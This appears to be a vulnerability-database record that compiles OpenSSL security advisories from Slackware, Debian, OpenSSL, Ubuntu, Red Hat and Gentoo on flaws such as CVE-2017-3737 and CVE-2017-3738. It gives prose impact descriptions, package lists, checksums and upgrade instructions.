Slackware 13.37 packages: c1c1d0a8483d4218fdd29ce1b2eb9e63 openssl-0.9.8zh-i486-2_slack13.37.txz 34ee96116c28ef08fbc08ab70b14f5a9 openssl-solibs-0.9.8zh-i486-2_slack13.37.txz
Slackware x86_64 13.37 packages: 32dadc44ba5dbd7621023e8fec1e3069 openssl-0.9.8zh-x86_64-2_slack13.37.txz 2f0205cfba8228e3d1980cef54d8668b openssl-solibs-0.9.8zh-x86_64-2_slack13.37.txz
Slackware 14.0 packages: e6d4b3a76383f9f253da4128ba23f269 openssl-1.0.1u-i486-1_slack14.0.txz c61d31a1751ae39af89d3fee0b54f0d8 openssl-solibs-1.0.1u-i486-1_slack14.0.txz
Slackware x86_64 14.0 packages: 96be19e6a96c9beb5d3bbc55348fb483 openssl-1.0.1u-x86_64-1_slack14.0.txz b7a8fa2ebd16c8ae106fc1267bc29eca openssl-solibs-1.0.1u-x86_64-1_slack14.0.txz
Slackware 14.1 packages: 099b960e62eaea5d1a639a61a2fabca7 openssl-1.0.1u-i486-1_slack14.1.txz b5d5219e05db97f63c4d6c389d6884fb openssl-solibs-1.0.1u-i486-1_slack14.1.txz
Slackware x86_64 14.1 packages: fc96c87d76c9d1efd1290ac847fa7c7c openssl-1.0.1u-x86_64-1_slack14.1.txz e873b66f84f45ea34d028a3d524ce573 openssl-solibs-1.0.1u-x86_64-1_slack14.1.txz
Slackware 14.2 packages: e03fab49e9d967c5612484d919dd0268 openssl-1.0.2n-i586-1_slack14.2.txz 08747665f462b8f8c2832853e38e1e6f openssl-solibs-1.0.2n-i586-1_slack14.2.txz
Slackware x86_64 14.2 packages: b3a50ce9b6e6d449a8169e95d0a9612d openssl-1.0.2n-x86_64-1_slack14.2.txz c802bcfdfc5ff50f4ff8f9d3854201a6 openssl-solibs-1.0.2n-x86_64-1_slack14.2.txz
Slackware -current packages: 94858e542e5e174cddd6ebc2f8901dfe a/openssl-solibs-1.0.2n-i586-1.txz e74abd2caa67240856cbe198051739db n/openssl-1.0.2n-i586-1.txz
Slackware x86_64 -current packages: 708ff8cacfe797d28cb93e537ab7d4ee a/openssl-solibs-1.0.2n-x86_64-1.txz ed92a17a9345cfd0fbe7dc2f83eade22 n/openssl-1.0.2n-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the packages as root:
upgradepkg openssl-1.0.2n-i586-1_slack14.2.txz openssl-solibs-1.0.2n-i586-1_slack14.2.txz
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address.
Details can be found in the upstream advisory: https://www.openssl.org/news/secadv/20180327.txt
For the oldstable distribution (jessie), these problems have been fixed in version 1.0.1t-1+deb8u8. The oldstable distribution is not affected by CVE-2017-3738.
For the stable distribution (stretch), these problems have been fixed in version 1.1.0f-3+deb9u2.
For the detailed security status of openssl please refer to its security tracker page at: https://security-tracker.debian.org/tracker/openssl
Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----
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Show details on source website{
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"description": {
"_id": null,
"data": "There is an overflow bug in the AVX2 Montgomery multiplication procedure used in exponentiation with 1024-bit moduli. No EC algorithms are affected. Analysis suggests that attacks against RSA and DSA as a result of this defect would be very difficult to perform and are not believed likely. Attacks against DH1024 are considered just feasible, because most of the work necessary to deduce information about a private key may be performed offline. The amount of resources required for such an attack would be significant. However, for an attack on TLS to be meaningful, the server would have to share the DH1024 private key among multiple clients, which is no longer an option since CVE-2016-0701. This only affects processors that support the AVX2 but not ADX extensions like Intel Haswell (4th generation). Note: The impact from this issue is similar to CVE-2017-3736, CVE-2017-3732 and CVE-2015-3193. OpenSSL version 1.0.2-1.0.2m and 1.1.0-1.1.0g are affected. Fixed in OpenSSL 1.0.2n. Due to the low severity of this issue we are not issuing a new release of OpenSSL 1.1.0 at this time. The fix will be included in OpenSSL 1.1.0h when it becomes available. The fix is also available in commit e502cc86d in the OpenSSL git repository. This vulnerability CVE-2017-3736 , CVE-2017-3732 and CVE-2015-3193 Similar problem.It may be affected unspecified. \nAn attacker can exploit this issue to gain access to sensitive information that may aid in further attacks. The intent was that if a fatal error occurred during a handshake then\nOpenSSL would move into the error state and would immediately fail if you\nattempted to continue the handshake. This works as designed for the explicit\nhandshake functions (SSL_do_handshake(), SSL_accept() and SSL_connect()),\nhowever due to a bug it does not work correctly if SSL_read() or SSL_write() is\ncalled directly. In that scenario, if the handshake fails then a fatal error\nwill be returned in the initial function call. If SSL_read()/SSL_write() is\nsubsequently called by the application for the same SSL object then it will\nsucceed and the data is passed without being decrypted/encrypted directly from\nthe SSL/TLS record layer. \n\nIn order to exploit this issue an application bug would have to be present that\nresulted in a call to SSL_read()/SSL_write() being issued after having already\nreceived a fatal error. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2n\n\nThis issue was reported to OpenSSL on 10th November 2017 by David Benjamin\n(Google). The fix was proposed by David Benjamin and implemented by Matt Caswell\nof the OpenSSL development team. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2n\n\nThis issue was reported to OpenSSL on 22nd November 2017 by David Benjamin\n(Google). The issue was originally found via the OSS-Fuzz project. \n\nNote\n====\n\nSupport for version 1.0.1 ended on 31st December 2016. Support for versions\n0.9.8 and 1.0.0 ended on 31st December 2015. Those versions are no longer\nreceiving security updates. \n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv/20171207.txt\n\nNote: the online version of the advisory may be updated with additional details\nover time. \n\nFor details of OpenSSL severity classifications please see:\nhttps://www.openssl.org/policies/secpolicy.html\n. \nOpenSSL Security Advisory [27 Mar 2018]\n========================================\n\nConstructed ASN.1 types with a recursive definition could exceed the stack (CVE-2018-0739)\n==========================================================================================\n\nSeverity: Moderate\n\nConstructed ASN.1 types with a recursive definition (such as can be found in\nPKCS7) could eventually exceed the stack given malicious input with\nexcessive recursion. This could result in a Denial Of Service attack. There are\nno such structures used within SSL/TLS that come from untrusted sources so this\nis considered safe. \n\nIncorrect CRYPTO_memcmp on HP-UX PA-RISC (CVE-2018-0733)\n========================================================\n\nSeverity: Moderate\n\nBecause of an implementation bug the PA-RISC CRYPTO_memcmp function is\neffectively reduced to only comparing the least significant bit of each byte. \nThis allows an attacker to forge messages that would be considered as\nauthenticated in an amount of tries lower than that guaranteed by the security\nclaims of the scheme. The module can only be compiled by the HP-UX assembler, so\nthat only HP-UX PA-RISC targets are affected. \n===========================================================================\nUbuntu Security Notice USN-3512-1\nDecember 11, 2017\n\nopenssl vulnerabilities\n===========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 17.10\n- Ubuntu 17.04\n- Ubuntu 16.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in OpenSSL. \n\nSoftware Description:\n- openssl: Secure Socket Layer (SSL) cryptographic library and tools\n\nDetails:\n\nDavid Benjamin discovered that OpenSSL did not correctly prevent\nbuggy applications that ignore handshake errors from subsequently calling\ncertain functions. While unlikely, a remote attacker could possibly\nuse this issue to recover private keys. (CVE-2017-3738)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 17.10:\n libssl1.0.0 1.0.2g-1ubuntu13.3\n\nUbuntu 17.04:\n libssl1.0.0 1.0.2g-1ubuntu11.4\n\nUbuntu 16.04 LTS:\n libssl1.0.0 1.0.2g-1ubuntu4.10\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: openssl security and bug fix update\nAdvisory ID: RHSA-2018:0998-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2018:0998\nIssue date: 2018-04-10\nCVE Names: CVE-2017-3736 CVE-2017-3737 CVE-2017-3738 \n=====================================================================\n\n1. Summary:\n\nAn update for openssl is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\nRed Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7) - aarch64, ppc64le, s390x\nRed Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7) - aarch64, ppc64le, s390x\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and\nTransport Layer Security (TLS) protocols, as well as a full-strength\ngeneral-purpose cryptography library. \n\nSecurity Fix(es):\n\n* openssl: bn_sqrx8x_internal carry bug on x86_64 (CVE-2017-3736)\n\n* openssl: Read/write after SSL object in error state (CVE-2017-3737)\n\n* openssl: rsaz_1024_mul_avx2 overflow bug on x86_64 (CVE-2017-3738)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.5 Release Notes linked from the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nFor the update to take effect, all services linked to the OpenSSL library\nmust be restarted, or the system rebooted. \n\n5. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssl-1.0.2k-12.el7.src.rpm\n\nx86_64:\nopenssl-1.0.2k-12.el7.x86_64.rpm\nopenssl-debuginfo-1.0.2k-12.el7.i686.rpm\nopenssl-debuginfo-1.0.2k-12.el7.x86_64.rpm\nopenssl-libs-1.0.2k-12.el7.i686.rpm\nopenssl-libs-1.0.2k-12.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.2k-12.el7.i686.rpm\nopenssl-debuginfo-1.0.2k-12.el7.x86_64.rpm\nopenssl-devel-1.0.2k-12.el7.i686.rpm\nopenssl-devel-1.0.2k-12.el7.x86_64.rpm\nopenssl-perl-1.0.2k-12.el7.x86_64.rpm\nopenssl-static-1.0.2k-12.el7.i686.rpm\nopenssl-static-1.0.2k-12.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssl-1.0.2k-12.el7.src.rpm\n\nx86_64:\nopenssl-1.0.2k-12.el7.x86_64.rpm\nopenssl-debuginfo-1.0.2k-12.el7.i686.rpm\nopenssl-debuginfo-1.0.2k-12.el7.x86_64.rpm\nopenssl-libs-1.0.2k-12.el7.i686.rpm\nopenssl-libs-1.0.2k-12.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.2k-12.el7.i686.rpm\nopenssl-debuginfo-1.0.2k-12.el7.x86_64.rpm\nopenssl-devel-1.0.2k-12.el7.i686.rpm\nopenssl-devel-1.0.2k-12.el7.x86_64.rpm\nopenssl-perl-1.0.2k-12.el7.x86_64.rpm\nopenssl-static-1.0.2k-12.el7.i686.rpm\nopenssl-static-1.0.2k-12.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssl-1.0.2k-12.el7.src.rpm\n\nppc64:\nopenssl-1.0.2k-12.el7.ppc64.rpm\nopenssl-debuginfo-1.0.2k-12.el7.ppc.rpm\nopenssl-debuginfo-1.0.2k-12.el7.ppc64.rpm\nopenssl-devel-1.0.2k-12.el7.ppc.rpm\nopenssl-devel-1.0.2k-12.el7.ppc64.rpm\nopenssl-libs-1.0.2k-12.el7.ppc.rpm\nopenssl-libs-1.0.2k-12.el7.ppc64.rpm\n\nppc64le:\nopenssl-1.0.2k-12.el7.ppc64le.rpm\nopenssl-debuginfo-1.0.2k-12.el7.ppc64le.rpm\nopenssl-devel-1.0.2k-12.el7.ppc64le.rpm\nopenssl-libs-1.0.2k-12.el7.ppc64le.rpm\n\ns390x:\nopenssl-1.0.2k-12.el7.s390x.rpm\nopenssl-debuginfo-1.0.2k-12.el7.s390.rpm\nopenssl-debuginfo-1.0.2k-12.el7.s390x.rpm\nopenssl-devel-1.0.2k-12.el7.s390.rpm\nopenssl-devel-1.0.2k-12.el7.s390x.rpm\nopenssl-libs-1.0.2k-12.el7.s390.rpm\nopenssl-libs-1.0.2k-12.el7.s390x.rpm\n\nx86_64:\nopenssl-1.0.2k-12.el7.x86_64.rpm\nopenssl-debuginfo-1.0.2k-12.el7.i686.rpm\nopenssl-debuginfo-1.0.2k-12.el7.x86_64.rpm\nopenssl-devel-1.0.2k-12.el7.i686.rpm\nopenssl-devel-1.0.2k-12.el7.x86_64.rpm\nopenssl-libs-1.0.2k-12.el7.i686.rpm\nopenssl-libs-1.0.2k-12.el7.x86_64.rpm\n\nRed Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7):\n\nSource:\nopenssl-1.0.2k-12.el7.src.rpm\n\naarch64:\nopenssl-1.0.2k-12.el7.aarch64.rpm\nopenssl-debuginfo-1.0.2k-12.el7.aarch64.rpm\nopenssl-devel-1.0.2k-12.el7.aarch64.rpm\nopenssl-libs-1.0.2k-12.el7.aarch64.rpm\n\nppc64le:\nopenssl-1.0.2k-12.el7.ppc64le.rpm\nopenssl-debuginfo-1.0.2k-12.el7.ppc64le.rpm\nopenssl-devel-1.0.2k-12.el7.ppc64le.rpm\nopenssl-libs-1.0.2k-12.el7.ppc64le.rpm\n\ns390x:\nopenssl-1.0.2k-12.el7.s390x.rpm\nopenssl-debuginfo-1.0.2k-12.el7.s390.rpm\nopenssl-debuginfo-1.0.2k-12.el7.s390x.rpm\nopenssl-devel-1.0.2k-12.el7.s390.rpm\nopenssl-devel-1.0.2k-12.el7.s390x.rpm\nopenssl-libs-1.0.2k-12.el7.s390.rpm\nopenssl-libs-1.0.2k-12.el7.s390x.rpm\n\nRed Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7):\n\naarch64:\nopenssl-debuginfo-1.0.2k-12.el7.aarch64.rpm\nopenssl-perl-1.0.2k-12.el7.aarch64.rpm\nopenssl-static-1.0.2k-12.el7.aarch64.rpm\n\nppc64le:\nopenssl-debuginfo-1.0.2k-12.el7.ppc64le.rpm\nopenssl-perl-1.0.2k-12.el7.ppc64le.rpm\nopenssl-static-1.0.2k-12.el7.ppc64le.rpm\n\ns390x:\nopenssl-debuginfo-1.0.2k-12.el7.s390.rpm\nopenssl-debuginfo-1.0.2k-12.el7.s390x.rpm\nopenssl-perl-1.0.2k-12.el7.s390x.rpm\nopenssl-static-1.0.2k-12.el7.s390.rpm\nopenssl-static-1.0.2k-12.el7.s390x.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nopenssl-debuginfo-1.0.2k-12.el7.ppc.rpm\nopenssl-debuginfo-1.0.2k-12.el7.ppc64.rpm\nopenssl-perl-1.0.2k-12.el7.ppc64.rpm\nopenssl-static-1.0.2k-12.el7.ppc.rpm\nopenssl-static-1.0.2k-12.el7.ppc64.rpm\n\nppc64le:\nopenssl-debuginfo-1.0.2k-12.el7.ppc64le.rpm\nopenssl-perl-1.0.2k-12.el7.ppc64le.rpm\nopenssl-static-1.0.2k-12.el7.ppc64le.rpm\n\ns390x:\nopenssl-debuginfo-1.0.2k-12.el7.s390.rpm\nopenssl-debuginfo-1.0.2k-12.el7.s390x.rpm\nopenssl-perl-1.0.2k-12.el7.s390x.rpm\nopenssl-static-1.0.2k-12.el7.s390.rpm\nopenssl-static-1.0.2k-12.el7.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.2k-12.el7.i686.rpm\nopenssl-debuginfo-1.0.2k-12.el7.x86_64.rpm\nopenssl-perl-1.0.2k-12.el7.x86_64.rpm\nopenssl-static-1.0.2k-12.el7.i686.rpm\nopenssl-static-1.0.2k-12.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssl-1.0.2k-12.el7.src.rpm\n\nx86_64:\nopenssl-1.0.2k-12.el7.x86_64.rpm\nopenssl-debuginfo-1.0.2k-12.el7.i686.rpm\nopenssl-debuginfo-1.0.2k-12.el7.x86_64.rpm\nopenssl-devel-1.0.2k-12.el7.i686.rpm\nopenssl-devel-1.0.2k-12.el7.x86_64.rpm\nopenssl-libs-1.0.2k-12.el7.i686.rpm\nopenssl-libs-1.0.2k-12.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.2k-12.el7.i686.rpm\nopenssl-debuginfo-1.0.2k-12.el7.x86_64.rpm\nopenssl-perl-1.0.2k-12.el7.x86_64.rpm\nopenssl-static-1.0.2k-12.el7.i686.rpm\nopenssl-static-1.0.2k-12.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2017-3736\nhttps://access.redhat.com/security/cve/CVE-2017-3737\nhttps://access.redhat.com/security/cve/CVE-2017-3738\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://access.redhat.com/documentation/en-US/red_hat_enterprise_linux/7/html/7.5_release_notes/index.html\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2018 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFazHmPXlSAg2UNWIIRAqu6AKDErP0kbrPwLuGhT0FWhHa/Os9K1gCfRI4r\nj0HnnUq1AsYgW3JsOqRcuTk=\n=hlqc\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. Description:\n\nThis release adds the new Apache HTTP Server 2.4.29 packages that are part\nof the JBoss Core Services offering. \n\nThis release serves as a replacement for Red Hat JBoss Core Services\nApache HTTP Server 2.4.23, and includes bug fixes and enhancements. Upstream acknowledges Shi Lei (Gear Team of Qihoo 360\nInc.) as the original reporter of CVE-2016-6306. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. JIRA issues fixed (https://issues.jboss.org/):\n\nJBCS-373 - Errata for httpd 2.4.29 GA RHEL 7\n\n7. \n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201712-03\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: OpenSSL: Multiple vulnerabilities\n Date: December 14, 2017\n Bugs: #629290, #636264, #640172\n ID: 201712-03\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in OpenSSL, the worst of which\nmay lead to a Denial of Service condition. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 dev-libs/openssl \u003c 1.0.2n \u003e= 1.0.2n\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in OpenSSL. Please review\nthe referenced CVE identifiers for details. \n\nImpact\n======\n\nA remote attacker could cause a Denial of Service condition, recover a\nprivate key in unlikely circumstances, circumvent security restrictions\nto perform unauthorized actions, or gain access to sensitive\ninformation. \n\nWorkaround\n==========\n\nThere are no known workarounds at this time. \n\nResolution\n==========\n\nAll OpenSSL users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-libs/openssl-1.0.2n\"\n\nReferences\n==========\n\n[ 1 ] CVE-2017-3735\n https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3735\n[ 2 ] CVE-2017-3736\n https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3736\n[ 3 ] CVE-2017-3737\n https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3737\n[ 4 ] CVE-2017-3738\n https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3738\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201712-03\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2017 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n--IrEhWFjxIJsFtqH1v1HHQsLm3nLmhNeP4--\n\n. \n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n+--------------------------+\npatches/packages/openssl-1.0.2n-i586-1_slack14.2.txz: Upgraded. \n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated packages for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8zh-i486-2_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8zh-i486-2_slack13.0.txz\n\nUpdated packages for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8zh-x86_64-2_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8zh-x86_64-2_slack13.0.txz\n\nUpdated packages for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8zh-i486-2_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8zh-i486-2_slack13.1.txz\n\nUpdated packages for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8zh-x86_64-2_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8zh-x86_64-2_slack13.1.txz\n\nUpdated packages for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8zh-i486-2_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8zh-i486-2_slack13.37.txz\n\nUpdated packages for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8zh-x86_64-2_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8zh-x86_64-2_slack13.37.txz\n\nUpdated packages for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1u-i486-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1u-i486-1_slack14.0.txz\n\nUpdated packages for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1u-x86_64-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1u-x86_64-1_slack14.0.txz\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1u-i486-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1u-i486-1_slack14.1.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1u-x86_64-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1u-x86_64-1_slack14.1.txz\n\nUpdated packages for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/openssl-1.0.2n-i586-1_slack14.2.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/openssl-solibs-1.0.2n-i586-1_slack14.2.txz\n\nUpdated packages for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/openssl-1.0.2n-x86_64-1_slack14.2.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/openssl-solibs-1.0.2n-x86_64-1_slack14.2.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.2n-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.2n-i586-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.2n-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.2n-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 packages:\n644fbae107aa826aeb955cec011af852 openssl-0.9.8zh-i486-2_slack13.0.txz\n6fa3075d061664f5bbe3d8de9e2bf368 openssl-solibs-0.9.8zh-i486-2_slack13.0.txz\n\nSlackware x86_64 13.0 packages:\nb53745715746f9dbef4a38dd8da03c94 openssl-0.9.8zh-x86_64-2_slack13.0.txz\n5976e4f969f6adc2b43ba1592a52d5ba openssl-solibs-0.9.8zh-x86_64-2_slack13.0.txz\n\nSlackware 13.1 packages:\ne0608c002b708abaf2f5ceee4e4b155d openssl-0.9.8zh-i486-2_slack13.1.txz\ncac0d5ccba2dccd979284f2051dab525 openssl-solibs-0.9.8zh-i486-2_slack13.1.txz\n\nSlackware x86_64 13.1 packages:\n01510ab2aab397be93e4bfdd04315bd0 openssl-0.9.8zh-x86_64-2_slack13.1.txz\n0be1f99d5391cbc3b15dcd4371cb621a openssl-solibs-0.9.8zh-x86_64-2_slack13.1.txz\n\nSlackware 13.37 packages:\nc1c1d0a8483d4218fdd29ce1b2eb9e63 openssl-0.9.8zh-i486-2_slack13.37.txz\n34ee96116c28ef08fbc08ab70b14f5a9 openssl-solibs-0.9.8zh-i486-2_slack13.37.txz\n\nSlackware x86_64 13.37 packages:\n32dadc44ba5dbd7621023e8fec1e3069 openssl-0.9.8zh-x86_64-2_slack13.37.txz\n2f0205cfba8228e3d1980cef54d8668b openssl-solibs-0.9.8zh-x86_64-2_slack13.37.txz\n\nSlackware 14.0 packages:\ne6d4b3a76383f9f253da4128ba23f269 openssl-1.0.1u-i486-1_slack14.0.txz\nc61d31a1751ae39af89d3fee0b54f0d8 openssl-solibs-1.0.1u-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 packages:\n96be19e6a96c9beb5d3bbc55348fb483 openssl-1.0.1u-x86_64-1_slack14.0.txz\nb7a8fa2ebd16c8ae106fc1267bc29eca openssl-solibs-1.0.1u-x86_64-1_slack14.0.txz\n\nSlackware 14.1 packages:\n099b960e62eaea5d1a639a61a2fabca7 openssl-1.0.1u-i486-1_slack14.1.txz\nb5d5219e05db97f63c4d6c389d6884fb openssl-solibs-1.0.1u-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 packages:\nfc96c87d76c9d1efd1290ac847fa7c7c openssl-1.0.1u-x86_64-1_slack14.1.txz\ne873b66f84f45ea34d028a3d524ce573 openssl-solibs-1.0.1u-x86_64-1_slack14.1.txz\n\nSlackware 14.2 packages:\ne03fab49e9d967c5612484d919dd0268 openssl-1.0.2n-i586-1_slack14.2.txz\n08747665f462b8f8c2832853e38e1e6f openssl-solibs-1.0.2n-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 packages:\nb3a50ce9b6e6d449a8169e95d0a9612d openssl-1.0.2n-x86_64-1_slack14.2.txz\nc802bcfdfc5ff50f4ff8f9d3854201a6 openssl-solibs-1.0.2n-x86_64-1_slack14.2.txz\n\nSlackware -current packages:\n94858e542e5e174cddd6ebc2f8901dfe a/openssl-solibs-1.0.2n-i586-1.txz\ne74abd2caa67240856cbe198051739db n/openssl-1.0.2n-i586-1.txz\n\nSlackware x86_64 -current packages:\n708ff8cacfe797d28cb93e537ab7d4ee a/openssl-solibs-1.0.2n-x86_64-1.txz\ned92a17a9345cfd0fbe7dc2f83eade22 n/openssl-1.0.2n-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the 